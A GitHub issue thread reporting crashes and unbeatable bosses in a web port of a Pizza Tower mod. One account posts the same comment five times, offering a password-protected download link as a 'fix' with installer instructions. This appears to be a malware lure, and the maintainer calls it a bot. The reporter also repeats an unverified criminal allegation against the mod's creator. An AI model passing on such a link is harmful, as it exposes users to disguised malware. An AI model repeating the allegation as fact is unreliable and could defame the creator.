### ISSUE TITLE
Holy shit, this build is buggy as hell lol

### ISSUE THREAD

**Issue by HogOfTheHill** [burnedpopcorn/PT-Stuffed-Crust-Web-Port#2]
It's already well known that Stuffed Crust got cancelled for the creator being a hold of some CP, but as far as I know, the original mod is not as buggy as this web port. Here's a list of some bugs/crashes I still consistently encounter on various playthroughs:
~~GAME CRASHES~~
~Reaching Pizza Time with the Panic BG and/or Panic Tilt options on
~Trying to finish any level/boss fight
~Entering Gnome Forest
~Getting in close range of the ghost transformation
~Trying to score with the cheese ball in Golf (and in The Crumbling Tower of Pizza to that extent)
~~GENERAL BUGS~~
~All bosses aren't beatable for different reasons
~~Pepperman: Reaching the statue phase, he'll not freeze to be tangible
~~Vigilante: He'll stay intangible while after transitioning from attacks, so he can't be hit
~~Noise: He goes down in one hit, which would be fine, but the game crashes when beating it as previously implied 
~~Fake Peppino: Even if hit, he won't transition phases
~~Pizzaface: Enemies throw at pizzaface won't deal damage
~Changing costumes won't change your current outfit (this also extends to most other web ports)

Some of these fixed might not be the fault of the Web Porter, and these just came with the cancellation of the mod, but it'll just be here just to point out the problems with this build. Again, I'm not pinging everything here on the Porter, since some of these bugs/crashes aren't really fixable without some extra effort put into this Web Port. Also sorry if this got quite a bit formal, I just thought of pointing out the issues to either be fixed, or to show what specific bugs are in the build.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by burnedpopcorn** [comment]
Yeah. I kinda rushed this one because I thought everyone in my discord was getting impatient

**Comment by burnedpopcorn** [comment]
I'm probably gonna try and fix these issues when I'm done fixing My Noise Update Web Port

**Comment by burnedpopcorn** [comment]
Also I have no idea who the other guy is
Seems like a bot or something
